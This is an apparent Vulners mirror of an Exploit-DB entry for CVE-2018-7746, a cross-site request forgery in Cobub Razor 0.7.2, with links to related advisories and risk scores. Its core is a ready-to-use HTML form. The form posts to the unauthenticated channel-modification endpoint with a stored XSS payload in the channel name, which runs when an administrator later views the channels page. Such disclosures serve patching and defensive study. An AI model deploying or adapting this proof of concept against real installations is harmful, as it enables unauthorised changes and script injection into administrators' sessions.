Lucene search
K

Cobub Razor 0.7.2 - Cross-Site Request Forgery

🗓️ 06 Apr 2018 00:00:00Reported by ppbType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Cobub Razor 0.7.2 - Cross-Site Request Forgery vulnerability in channel modificatio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cobub Razor 0.7.2 - Cross Site Request Forgery Vulnerability
7 Apr 201800:00
zdt
Circl
CVE-2018-7746
6 Apr 201800:00
circl
CNVD
Cobub Razor Cross-Site Scripting Vulnerability
8 Mar 201800:00
cnvd
CVE
CVE-2018-7746
7 Mar 201817:00
cve
Cvelist
CVE-2018-7746
7 Mar 201817:00
cvelist
EUVD
EUVD-2018-19461
7 Oct 202500:30
euvd
exploitpack
Cobub Razor 0.7.2 - Cross-Site Request Forgery
6 Apr 201800:00
exploitpack
NVD
CVE-2018-7746
7 Mar 201817:29
nvd
Packet Storm
Cobub Razor 0.7.2 Cross Site Request Forgery
6 Apr 201800:00
packetstorm
Prion
Cross site scripting
7 Mar 201817:29
prion
Rows per page
# Exploit Title: Cobub Razor 0.7.2 Cross Site Request Forgery
# Date: 2018-03-07
# Exploit Author: ppb
# Vendor Homepage: https://github.com/cobub/razor/
# Software Link: https://github.com/cobub/razor/
# Version: 0.72
# CVE : CVE-2018-7746

There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel_id" value="979" />
      <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2018 00:00Current
7High risk
Vulners AI Score7
CVSS 26.8
CVSS 3.18.8
EPSS0.00797
29